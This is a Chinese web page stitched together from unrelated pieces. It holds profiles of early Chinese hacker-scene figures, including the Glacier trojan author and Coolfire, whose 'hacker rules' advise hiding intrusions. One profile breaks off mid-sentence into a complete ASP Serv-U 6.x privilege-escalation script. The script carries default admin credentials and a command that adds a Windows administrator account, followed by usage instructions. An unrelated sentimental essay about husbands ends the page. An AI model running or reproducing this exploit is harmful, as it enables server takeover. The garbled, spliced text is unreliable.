LOG:绿色兵团早期成员，曾参加过第一次绿色兵团年会，话语不多，但是为人很诚恳，我一直感到欠疚，他从外地赶来开会我没有招呼好他。

雨馨:千万别以为这是个女孩，不过他的cn105没有人不知道，以前是绿色兵团的常客，技术提高很快。

LoGon(doorless):一个非常谦虚和好学的人，值得交往的朋友。

liwrml:绿色兵团分站，麒麟网络安全小组的站长，兵团铁杆支持者。

Chener:需要什么软件，需要什么地址去问他，觉得他就象活的网络词典。

大鹰:补天的得力干将，很有互助精神，你问他什么问题他总是尽量回答你。

shutgun:一个真正热爱网络安全的技术人员，不为名利，不为金钱。

WoWo:患难之中见真情，得人滴水之恩当涌泉相报。

仙剑:仙剑乐园有一大批的中国安全爱好者，是中国最大的一个电话破解站点。

Casper:是也很好的朋友，他有很cool的外型，谦虚和严谨，对技术从不保留，是个真正热爱安全的技术人员。

椰子:写过不少好文章，看事情比教成熟。

WhoamI:热心，乐于助人，只是有个坏习惯，千万别在他喝醉的时候去和他讨论技术。

**illy:中国每个安全站点的角落都能看到他的灌水贴，绿色兵团常客

weiyangsheng:绿色兵团铁杆支持者，比较低调。

BadBoy:中国红客的领袖人物，知识面教广也是兵团的支持者。

柳咏:绿色兵团的拥护者，其实他比很多人都要强，可是他总是很谦虚，说自己懂的很少，而且不太说废话，只和别人探讨技术。

小小龙女:绿色兵团的很多文章有他翻译，精通linux。

阿飞(remix):绿色兵团的成员，老说自己是垃圾，废话是挺多的，不过人不错，为兵团做了很事情。

五月玫瑰:绿色兵团的成员，虽然没有说过一句话，没见过一次面，而且几乎不看到他发言，

直到有一天他发来的信，把自己发现的微软输入法的新漏洞无私的告诉了我们，永远都会感谢他对兵团的支持。

Ghost_happy:他的桌面实在是叫人流口水，不行你去问他要一张截图看看（win2k + vm +FreeBsd)。

GoodWell:请允许我把自己的名字写在最后，正是因为大家的努力，才会有一个美丽的光环照在我的头上，我真的、真的愿意做大家成功道路上的一颗垫脚石，一颗永远不需要闪光的垫脚石，我愿意看着你们一个一个的走向成功的道路，同时也希望不久的将来能把你的名字写上去，去为龙的传人争光。

第六章：木马教父冰河

网名： glacier ，木马冰河

真名：黄鑫

毕业院校：西安电子科技大学

工作：网络安全网站“安全焦点”

性别：男

年纪：28

现居住：广西

网站：xfocus.net

婚姻：刚结婚不久

=============================================================

　　大家都知道微软网站被黑客入侵是因为木马软件的缘故。这个以特洛伊战争中使用的木马正大摇大摆地杀入互联网的领地，而这个软件的编写者就是被我们称为木马教父的黄鑫。99年，木马虽然已经在黑客中间遍布使用，但多数为国外的BO和BUS等木马，对于一些刚接触黑客的生手来说，理解这些软件的使用方法和熟练使用这些软件无疑成为了“通往黑客道路”上的最大的难题，此外这些木马多数能够被杀毒软件擒获，使得国内的黑客多数不愿意去用木马。正当国内大多数黑客们苦苦寻觅新的国外木马时，一款中国人自己的编写的木马悄悄诞生了，它就是冰河。冰河在诞生之初凭借着国产化和暂时无杀毒软件能防杀的特点迅速地成为了黑客们使用最广泛的木马。冰河本不该归属于木马的行列的，按照冰河作者黄鑫的话说，他编写冰河完全是靠自己的兴趣和网友的鼓励，最初只是想编写一个方便自己的远程控制软件，不曾想竟然编成了一个中国流传使用最广泛的黑客软件。

　　在1.2版本冰河发布以后，国内的黑客们大多认同了冰河，把冰河作为了木马软件的首选。经过多方的支持和鼓励，特别是来自中国国内的黑客们的支持使得黄鑫又努力开发出冰河2.0。2.0新增加了许多以前没有的功能和特性，特别是它在使用的过程中比1.2的更加方便更加的隐蔽好，所以2.0的出现使得冰河立即成为了人尽皆知的木马类黑客软件。冰河良好的隐蔽性和使用简单的特点让国内许多想成为黑客，但又不懂黑客技术的人深深地过了一把黑客瘾，利用冰河入侵个人系统计算机后，他们便能够利用冰河得到他们想得到的一切。现今很多出名的黑客都是利用冰河迈向通往黑客道路的第一步的。黄鑫的冰河让很多人体会了做黑客的快感，更让很多人了解了网络安全的重要性。

　　其实就黑客的定性而言，身为一个数据库开发程序员的黄鑫或许根本算不上一个黑客，他从来没有黑过任何一个网站，甚至在开发测试冰河的时候也是利用自己和朋友的计算机来检验。然而我们不能否认冰河的强大功能，特别是22版的冰河开发出后，它可以让任何一个菜鸟顷刻之间变成一个极否有攻击力的黑客。这一切理由都让黄鑫成为了中国黑客，特别是初级黑客们的精神领袖。我们几乎能从每一个想了解黑客的朋友的计算机里找到冰河的身影。在中国千千万万个连接在互联网上的计算机中，几乎每一百台里就埋藏着一个冰河，我们也不难发现在大大小小的网吧里时常能够听到那些初级黑客利用冰河搜寻出冰河的受害者后发出的兴奋高呼。冰河，已经成为了中国木马的代名词。冰河已经成为了互联网恐怖的象征。

　　现如今黄鑫已经停止了对冰河后续版本的开发，作为程序员的良知让他不得不面对冰河作为一个黑客工具的危害性。没有人想成为人民的公敌，正是这些良知让黄鑫放弃了冰河的后期开发。作为一个无意间带动了中国互联网络安全发展的人，他的名字应向他的软件一样，永远值得我们去回忆，虽然他带给我们的只有那个经典的木马程序，但这依然不丝毫影响我们对他的崇敬。冰河在打开我们电脑大门的同时也打开了我们对网络安全认识的大门。

　　黄鑫还是西安电子科技大学的学生时，为了给自己的电脑杀毒，黄鑫一头栽进网络安全的世界里再也没有出来。1999年上半年，黄鑫写出了冰河木马软件。随着冰河木马在网上的迅速传播，黄鑫的名字被越来越多的人熟悉。

　　冰河木马一经问世就颇受争议，争议的核心是它既可当作植入被攻击端的木马，也可作为正当的网络远程管理利器。黄鑫自己从未用它黑过任何一台别人的电脑，如同一个纯粹的剑客武痴，他关注的只是技术本身。

　　在那场中美黑客大战中，许多人都用了黄鑫写的程序去攻击。黄鑫始终认为，对真正的黑客来说，破坏并不是目的，技术研究的最终目的是在自由与开放的环境中发挥每个人的专长。

　　江湖中，任何厉害的“武功”本身并没有害，只是要看用它来杀人，还是救人。当90%的人用“冰河”来给别人种木马时，黄鑫觉得“冰河”已失去了再升级的意义，他终止了冰河木马升级开发后，又关闭了“木马冰河”个人站点，因为这个网站正被众多狂热的黑客痴迷者变成“木马黑机”的交流园地。

　　2000年底，黄鑫加盟网络安全网站“安全焦点”，他将完成公司本职工作之外的精力都用于知名扫描器“XSCAN″的开发升级以及“安全焦点″的建设维护。

　　朋友和女友对黄鑫的评价是：冰河做事情比较踏实，重实际，技术很好但是谦虚，这就是他的人格魅力。

　　黄鑫，木马的精神领袖。他应当之无愧地为中国黑客软件的头把交椅。

第七章：大哥袁仁广—“袁哥”

网名：袁哥(yuange)

姓名：袁仁广

别名：大兔子(datuzi)

性别：男

年龄：29岁

擅长：windows系列

籍贯：重庆市

个人网站：yuange.yeah.net

公司/网站名：中联绿盟信息技术(北京)有限公司

=============================================================

　　提起袁哥我想在安全界混的人无人不晓。他在windows系统方面的造诣，在国内应该是绝对一流的。1999年在他的个人站点里面提过的windows的共享漏洞，可是很多人都用过了的吧！知道袁哥的人很多，但是袁哥的经历却是鲜为人知。

　　袁哥原来喜欢的是数学，崇拜科学家(不知道黑客算不算科学家)。因为他很喜欢数学，所以很小就开始自学数学。数学方面从小学学初中、初中学高中、高中学大学都学遍了，还“研究”了部分研究生课程。袁哥的自学能力很强，在学习方面的理解力、思维都比较流畅，学习东西能够理解别人的那种思想、别人的思维方式，这样的效率很高的。互联网安全领域，本来就没有什么教材可言，多数都是自己摸索，袁哥的自学能力完全派上了用场。在大学里面因为专业的缘故，有很多机会接触病毒。病毒的防杀，软件加密解密，袁哥每天忙的不亦乐乎，在没有互联网的年代，病毒是最令人心动的领域，和互联网的黑客一样，病毒设计的理念技术都是最精尖的，不同的是，没有一个病毒制造者获得过黑客这样的名声，他们各个臭名昭著。袁哥精通汇编、CPU结构、操作系统等，天天研究如何跟踪调试别人程序。病毒、加密解密的一些技术与网络安全是相通的，而网络安全更多的是人与人之间的智力的较量，黑客就是一盘棋。袁哥摸到互联网，就再也不撒手了。就和打游戏一样，还是人与人对战好玩。由于大学的时候，袁哥所在的学校没有连接INTERNET网，那时他还没有真实的接触到网络安全这个话题。不过他通过一些介绍黑客的杂志、图书了解了一些网络安全的知识，可惜的是，这个媒体主要讨论的都是黑客文化，大学毕业后，袁哥的英语越来越差，看长篇的英文资料还不如汇编代码看起来舒服。看汇编代码就像看中文小说一样的人物，碰到互联网，就龙归大海。

　　一开始上班，袁哥也不是很如意。袁哥原来的单位的工作，只能和单片机打交道，整天面对冷冰冰的大铁块，袁哥当然不喜欢，业余时间去自己学、钻研。1998年左右，袁哥的工作单位接入互连网后袁哥就成了“彻底垮掉的一代”。那时的安全站点，差不多就是收集的一些别人的资料，堆叠在一起，大多都是一些老掉牙的消息。所以袁哥自己的主页的时候就主要是放他自己的一些技术资料，介绍一些自己的思想、技术。日积月累，袁哥感觉自己在单位从事的工作已经没有什么意思了，1999年底，袁哥决定换单位了。这一回进入了绿盟公司，正儿八经地做起网络安全生意。也算是步入正轨。

第八章：一代宗师：Coolfire

网名：CoolFire，Fetag

真名：林正隆

性别：男

籍贯：台湾

年纪：不详

个人网站：fetag.dhs.org

============================================================

　　台湾省是中国计算机发展早期，技术最领先的地方。Coolfire就是在这里成长起来。Coolfire最常用的名字是Fetag，我一直不明白这个名字到底是什么意思。但是这并不妨碍他成为中国黑客世界的大师级人物。Fetag这个名字远没有Coolfire出名，因为他用Coolfire这个名字连续写了8篇黑客入门文章。许多人非常熟悉这样的开头：“这不是一个教学文件，只是告诉你该如何破解系统，好让你能够将自己的系统作安全的保护，如果你能够将这份文件完全看完，你就能够知道电脑骇客们是如何入侵你的电脑，我是CoolFire，写这篇文章的目的是要让大家明白电脑安全的重要性，并不是教人Crack Password。

　　这就是典型的Coolfire风格。在互联网在中国落地的早期，听说过黑客的人很多，但是没有几个人真正知道黑客是怎样入侵系统。Coolfire正是告诉大家什么样的人是一个恐怖的黑客。我从来没有听说过Coolfire攻击过什么网站，现在的一些朋友也说Coolfire的8篇文章，根本够不上黑客级别，都是小儿科的基本知识。所以我更觉得Coolfire是一个辛辛苦苦的传道士，至少他是一个优秀的作家，一个深入人心的科普作者。迄今我还没有见到任何人，能够把黑客枯燥的入侵过程写得如此生动，简单。让一个上网的新手觉得黑客世界离自己真的不远，自己只要伸伸手，就可以成为神秘世界的一员。

　　事实的确如此。今天在互联网上，名气比较大的几个黑客，都不得不承认，Coolfire是他们的入门老师，他把一批最早的网虫带进了一个无穷神秘的世界。在这个世界里只有两个字：超越。

　　如今的互联网上，Coolfire的文章被贴得到处都是，无数刚学会设置拨号网络的少年，看着Coolfire的文章依然热血沸腾。人类原始的好奇本能被这冰冷的火焰激活，他们终于发现了电脑游戏之外有一个崭新的天地，在这个天地里，法律被重新洗牌。有的人能够走出黑客入侵的领域，成为大师，有的人迷失在其中，沦落囚犯。我们没有办法从道德上解读Coolfire，就像我们没有办法解读黑客本质一样。Coolfire教程，犹如8颗闪亮的星，他就是存在在那里，没有解释，没有善恶。仅仅是存在。

　　我们今天依然仰望那里，心中充满敬仰。虚拟的世界没有办法用传统的思维来套用，如果用简单的开锁来衡量黑客的发展，就太失于浅薄。Coolfire的作用没有尺度，他在一个更大的尺度上，俯瞰网络世界的发展。

　　Coolfire，一代宗师。把他列到中国黑客的第一名，应该没有什么争议。这是Coolfire写的黑客守则，尽管完全是一个个人的观点，其中有一些可乐的地方，但是许多人还是把它当作现实的人在虚拟世界的一种游戏法则。

　　1.不恶意破坏任何的系统，这样作只会给你带来麻烦。恶意破坏它人的软体将导致法律责任，如果你只是使用电脑，那仅为非法使用!!注意：千万不要破坏别人的软件或资料!!

　　2.不修改任何的系统文件，如果你是为了要进入系统而修改它，请在答到目的后将它改回原状。

　　3.不要轻易的将你要Hack的网站告诉你不信任的朋友。

　　4.不要在bbs上谈论你Hack的任何事情。

　　5.在Post文章的时候不要使用真名。

　　6.正在入侵的时候，不要随意离开你的电脑。

　　7.不要侵入或破坏政府机关的主机。

　　8.不在电话中谈论你Hack的任何事情。

　　9.将你的笔记放在安全的地方。10.想要成为Hacker就要真正的Hacking，读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11.已侵入电脑中的帐号不得清除或修改。12.不得修改系统档案，如果为了隐藏自己的侵入而作的修改则不在此限，但仍须维持原来系统的安全性，不得因得到系统的控制权而将门户大开!!13.不将你已破解的帐号分享与你的朋友。

第九章：精神领袖“孤独剑客”

网名：孤独剑客

真名：王献冰

毕业院校：郑州大学机电工程系

性别：男

年纪：30

个人站点：janker.org

　　黑客也许不需要出门，他们不需要阳光，甚至饮食结构也异于平常，他们只需要电脑，哦，对，还需要一根网线。

　　这是太多黑客题材的电影给我们留下的印象：他们大都在黑屋里，守着一台破旧的电脑疯狂地打字，然后整个世界被他改变了。

　　王献冰就是这其中的一员，太多有关黑客的事件中，都留有他的足印，但黑客永远不会用真名出名，如同他自己。

　　他是一个需要生活的黑客，他也需要事业，他的事业几乎始终围绕着信息安全展开——网络带给我们一个奇怪的思维，比如，我们不可能理解一个出色的小偷去做警察，但我们绝不反对一位著名的黑客成为信息安全企业的技术总监。王献冰的主要工作是信息安全，黑客也许只能算是他的副业。“我不喜欢黑客的群体活动，比如2001年针对美国的红客风波，他们使用的一些技术，我更早的时候曾经教过。”

　　他没有《黑客帝国》中那身很酷的皮夹克，也没有墨镜，见到记者的时候，他的头发有些凌乱，衣服也只能说是勉强包着身体——典型的单身男人，一切从简。他还有着中原人的憨厚，有什么就说什么，他的故事也许不像一个传奇，但足以让我们思考。

　　“如果不是朱明方，我想我可能就选择外企了。”

　　做企业是为了挣钱，打工是为了谋生，进外企是为了获得更好的收入。而对王献冰来说，去外企的念头产生，源自他对自己失败经历的总结。

　　1997年，毕业于郑州大学机电工程系的王献冰被分配到了郑州棉麻研究所。虽然才出大学，但喜欢计算机的他很早就掌握了高明的编程技术。“1995～1996年吧，冬天，我整晚上机，学校机房没有暖气，冷得厉害，我就披个大衣，为调试程序一晚上要重新启动机器几百次。”

　　他的计算机才能很快就在工作中显示出来，他也很快成了骨干。当然，毕竟是国有制单位，他的月收入少得可怜——工作一年，所有工资加起来，不够买一台当时比较落后的奔腾166电脑。

　　但他很快乐，并且开发出来了一些项目，这些项目为研究所带来了几十万元的收入，当然，他并没有得到什么。

　　互联网的诱惑让他感觉到了压力。其间，他因为给商都信息港写聊天室软件，开始大量接触互联网，也是从那时起他感觉到了信息安全的魅力——聊天室里天天都有捣乱者，如何让他们“闭嘴”，其实是一个学问。

　　此时，工资低得离谱使得王献冰闷闷不乐，他的工资甚至不够上网费。所以，1999年底，当清华大学深圳研究院设立的红军旗信息技术有限公司“挖”他时，面对着相当于他以前一年工资的月薪，他选择了跳槽。

　　“公司在深圳，我甚至没有买飞机票的钱，于是向朋友借了钱坐飞机，到了地方再报销，把钱还给朋友。”他说。

　　在那里，作为技术总监的他做完了西南证券飞虎证券交易网的整体安全解决方案，从这时起，他专攻网络安全领域，并一发而不可收拾。

　　“当时企业的气氛非常好，但一年过去了，市场开拓跟不上，接到的项目少，公司发展缓慢，我选择了走人。”

　　第二份职业仍然是网络安全，冲着一批很快要上的安全项目，王献冰来到了华诚集团下属的一家广州公司，承担了包括广东省公安系统、广州移动和南方证券等项目，但没过多久，他再次因为管理问题而离开了。

　　因为在网络上的名气越来越大，他的离职也引起了相当多的人的关注。上海创源就盯住了他，老总亲自出马请他到上海工作。于是他又到了上海，职位仍然是技术总监。但他当时并不知道，创源当时要做的只是一个投机的买卖，是为了报批软件园的土地而进行的短期行为，再加上做杀毒软件前期投入大、市场运作不合理，公司没过多久就陷于瘫痪状态，无法施展才能的他只好选择了离开。

　　这时，网泰金安公司老总亲自跑到上海来找他，“到我哪里，技术总监的位置给你留着。”

　　于是，王献冰来到了中国IT之乡北京中关村。这家公司投资7000万元人民币，又在北京，在王献冰看来，它的运作应该正规并且合理。但他没有想到的是，作为一个技术人员，他的建议通常得不到批复，“技术总监”的职位形同虚设。中关村中小企业的管理弊病使得他“做人比做研发还累”。

　　王献冰在中国的南北奔波，来回折腾了两年，职位始终是技术总监，面临的问题要么是管理不善，要么就是企业另有心思。王献冰是一个纯技术人员，他想做的仅仅是实现一个梦想，做好网络安全，但他的疑问是，究竟还有没有尊重人才、尊重技术的国内企业？

　　“我对国内人办的企业真的是失望了，说一套、做一套，管理也不正规。”王献冰的心思，似乎正体现着众多中关村技术人员的心声。他们也许并不在乎钱，但他们需要一个可以表演的舞台。

　　“我不认为我缺钱，我老家是农村的，在郑州时，每月只有几百元工资，除了吃饭干不了别的，我也能熬过来。”于是，王献冰决定寻找外企。被太多的熟人教训过，外企是如何正规、如何尊重人才，这对他也是一个不小的诱惑。他在北京找了个住处住下来，开始整理思路，回想从郑州出走以后的一系列变迁。在沉积了足足有半年多的时间后，王献冰放了个风出去，他对朋友说：“我现在要找工作了，我这回只想进外企。”

　　名声在外，一批著名的国际安全企业KPMG、ISS、CA等闻风而动，通过各种渠道找到王献冰。经历了几次事业挫折的王献冰开始慎重起来，与企业打交道采取了谈判的态度。就在这时，朱明方找到了他。

　　“朱总找到了我，跟我谈话，希望我不要去外企。”王献冰说。

　　王献冰是一个爱国者，有着极强的民族感，互联网上多次针对国外进行的网上报复行动，也许不会和他直接有关，但所采用的工具，对国外网站、服务器漏洞分析，却有不少是源自他的手。能在国内企业呆下去时，王献冰不会选择进外企，进外企永远是给他人打工，于自己的民族产业，尤其是知识产权，没有任何帮助。但王献冰又害怕进国内企业，因为赌输太多次，再赌下去，连赌本也得输了。

　　朱明方是北京盖特佳信息安全技术有限公司总裁，盖特佳注入3000万元资本进行信息安全领域的市场拓展，正需要像王献冰这样的黑客界顶级高手助阵。朱明方求贤若渴，而王献冰又不敢轻易答应，虽然以前认识并且交流过，王献冰对朱明方感觉不错，觉得可信，但还是会犹豫。

　　“我还是来了。”现在，王献冰又一次选择了国内企业，成为盖特佳公司技术总监。

　　王献冰在盖特佳专业从事网络安全方面的工作，“我们有个产品叫‘网闸’，就是对网络进行隔离用的，它可以有效地避免黑客攻击内部网络，是我们自主开发的！”此时的他神采飞扬。

　　除此之外，王献冰还做安全服务工作，为大型用户进行网络安全评估以及解决方案。他依然是那句话，“钱只要能保证自己发展就行，其他的要回报社会。”当然，他仍然继续着他的黑客交流活动。“我的个人网站，谁要是能攻破，他已经很高明了。”王献冰笑着说，“我现在白天主要是做项目、跑客户、做管理，周末、晚上则进行针对网络安全技术的研究工作。”换句话说，王献冰晚上也许会穿上黑色的皮夹克，戴着一副墨镜，疯狂地守着电脑键盘敲字，然后他笑了，网络因此而改变。

第10章：无为而为--Frankie

公司/网站：深圳安络科技公司

网名：Frankie

别名：老毒物、浪子

姓名：谢朝霞

性别：男

年龄：28

籍贯：湖南

擅长：Windows NT

网站：http://cnns.net

　　知道Frankie真名的人都会大吃一惊，大名鼎鼎的黑客原来是一个女的？事实又令他们吃惊，这个名字的主人是一位堂堂正正的男子汉。Frankie的名字因为“深圳晨光”安全网站而出名。从来没有听说过Frankie入侵过什么网站，但是许多黑客都非常佩服他。深圳晨光的浪子，每天花大量时间收集黑客信息，深入剖析Windows NT系统。他在这个领域的研究国内罕有对手。现在深圳的一些报纸把他成为华南网络安全专家。能够登录他网站“极度魔界”的许多人，都是中国顶尖的网络安全高手。一个朋友说：Frankie是最好的网管，只要有他守着，就可以放心了。

　　第一次见到Frankie是一个朋友介绍，当时Frankie所在的公司居然是一个研究自动对时手表的公司，通过电台发出的广播，钟表可以自动调整自己的时间，永远保证准时。这是一个非常吸引人的项目，但是Frankie做不太合适。我一直诧异，Frankie在公司到底负责什么方面的东西。在他的桌子前摆满的Linux、SUN OS的书。今年，Frankie终于走入正途，把对系统的研究转化成为产品。深圳安络科技公司成立了，像美国最著名的网络安全公司ISS的创始人一样，这些联合起来的网络安全专家，组成了一支队伍，要建立中国自己的网络安全系统。我之所以认为Coolfire是一个没有办法讨论的人物，就是因为有Frankie这样的人出现。回归“魔侠”问题，出路都是自己走的，起初并没有大的区别，但是一步一步走下来，有人把他变成了一种事业，有人误入歧途。

　　Frankie是一个比较奇怪的人，他很少用email不知道是什么时候养成的习惯。他自己有一个“浪子IRC”(一种网络聊天的工具)，他曾经告诉我，多数时候，他都在浪子IRC里。我每次登录进去都用“Find_Frankie”的名字，一进去就大喊，Frankie、Fiankie，随后就有许多老熟客般的人物出现，有时会告诉我他在哪里，多数时候是“今天没来！”“好的黑客都不用ICQ”Frankie曾经对我说过，但是真是不知道，他怎么能在网络世界自由的联系这么朋友。Frankie是进入互联网黑客世界比较早的人，找到了一些非常好的朋友，抓住了机遇。但是成功的路毕竟还是很长，从一个技术精尖的人，变化成为一个全面产品开发者，有许多路要走。

第11章：黑客大姐大“Wollf”

网名：Wollf

真名：王娟

籍贯：四川

性别：女

年纪：不详

============================================================

　　王娟是四川人。当初在海南一家网络公司工作时，在某次论坛上认识了一些圈内人，学计算机的王娟对网络安全产生了极大的兴趣。

　　其实主要还是这帮人吸引了她。对王娟来说，黑客在人格魅力上的吸引似乎比技术更大。接触了这个圈子，交了些朋友，就很需要得到圈子内的肯定，在和quack等一些朋友的交流中，王娟写出了wollf木马，奠下了她的“地位”。网络安全圈女性本来就少，像王娟这样知名的更是凤毛麟角。

　　2000年底，在海南的一个信息安全论坛上，已经是“标准女黑客”的王娟认识了“冰河”黄鑫，两个志同道合的人切磋之后，情投意合，开始并肩闯江湖。

　　其实，王娟很讨厌外行称自己是黑客，很多人眼中的黑客只是“乱黑人家机器的小孩子”，被她称为“小黑黑”。“这种小黑黑的行为，我真不敢认同”，黑别人机器这种事，对她简直就如喝白开水一样简单，但是她根本不屑于这样做。

　　王娟谈到“小黑黑”时的口气，给人的感觉就像第三次华山论剑后，杨过他们在山下发现一帮“论剑客”时的心情一样

<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = ffport
timeout=3

loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令：<%=pass%>...<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
%>
<form method="post" name="leaves">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.leaves.submit();",4000);
</script>
<%
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
%>
<center>提权完毕,已执行了命令：
<font color=red><%=cmd%></font>

<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>

<%
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
<center><form method="post" name="leaves">
<tr align="center" valign="middle">
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>

</tr>
<tr align="center" valign="middle">
<td width="200">用户名:</td>

<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>

</tr>
<tr align="center" valign="middle">
<td>口　令：</td>

<td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>

</tr>
<tr align="center" valign="middle">
<td>端　口：</td>

<td><input name="port" type="text" id="port" value="43958"></td>

服务器端口：

<td><input name="ffport" type="text" id="ffport" value="65500"></td>

服务器IP：

<td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>

</tr>
<tr align="center" valign="middle">
<td>系统路径：</td>

<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>

</tr>
<tr align="center" valign="middle">
<td>命　令：</td>

<td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>

</tr>
<tr align="center" valign="middle">
<td colspan="2"><input type="submit" name="Submit" value="提交">
<input type="reset" name="Submit2" value="重置">
<input name="action" type="hidden" id="action" value="1"></td>
</tr>
</form></center>

使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。
<% end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

老公,就是那个怕你的工作餐带得不够，又悄悄往饭盒里添菜的“坏男人”。  　　　　                老公，就是那个你将碗里吃剩的饭像倒垃圾一样倒进他碗里，而他还吃得像小猪一样欢天喜地的“傻男人” 。  　　　　老公，就是那个白天吵架不理你、闹得不可开交，而半夜为你拉好踢开的被角的“小气男人”  　　　　老公，就是那个钱包里只剩300大洋，却全力劝你买下700大洋你看中的一件衣服，帮你刷卡而自己顾不得买条领带的“笨男人”。  　　　　                老公，就是那个你偷懒跟他撒娇，要他为你倒水洗脚而明知中计还乐不可滋中套的“可爱男人” 。  　　　　老公，就是那个冬天怕你脚冷，而将你一双没有洗的脚紧紧抱在怀里的那个不怕臭的男人，简称“臭男人” 。  　　　　老公，就是那个吃了你放多了盐和辣椒的菜一边擤鼻涕一边猛喝茶，还不忘流着泪摇头晃脑说:老婆做的菜真好吃的“可怜男人” 。  　　　　               老公，就是那个星期六早晨你睡眼蒙胧去卫生间，他突然从门角跳出来抱你将你吓一大跳的“可恨男人” 。  　　　　老公，就是那个你“老朋友”来时，默默为你泡好红糖水，帮你买卫生巾时怕被熟人看见而匆忙间抓错东西抱头鼠蹿回来挨骂的“倒霉男人” 。  　　　　老公，就是那个陪你吃饭、陪你逛街、陪你回家、过马路紧紧牵着你小手的“****男人” 。  　　　　老公，就是那个下雨时将自己外套脱下，用胳膊为你遮风挡雨自己一身湿的“大男人” 。  　　　　女人，记住：老公，就是那个不让你吃亏的男人。  　　　　老公，就是那个让你有了他而不屑看其他男人一眼的男人。  　　　　               老公，就是那个一向吝啬的你，舍得在他身上花钱而竟然不心痛的男人。  　　　　               老公，就是那个让你星期六早晨放弃睡懒觉，而甘愿起床为他和他家人做早餐的男人。  　　　　               老公，就是那个让从前心高气傲不食人间烟火的你，变成现在单位、家庭两点一线贤妻良母的男人。  　　　　               老公，就是那个看到别人的脏衣服都觉恶心，却将他穿一星期未换黑不见底的臭袜子洗得雪白而毫无怨言的男人。 　　　　老公，就是那个你不顾一切阻力，为他受尽一切屈辱再穷再苦也心甘情愿跟他厮守一生的男人。  　　　　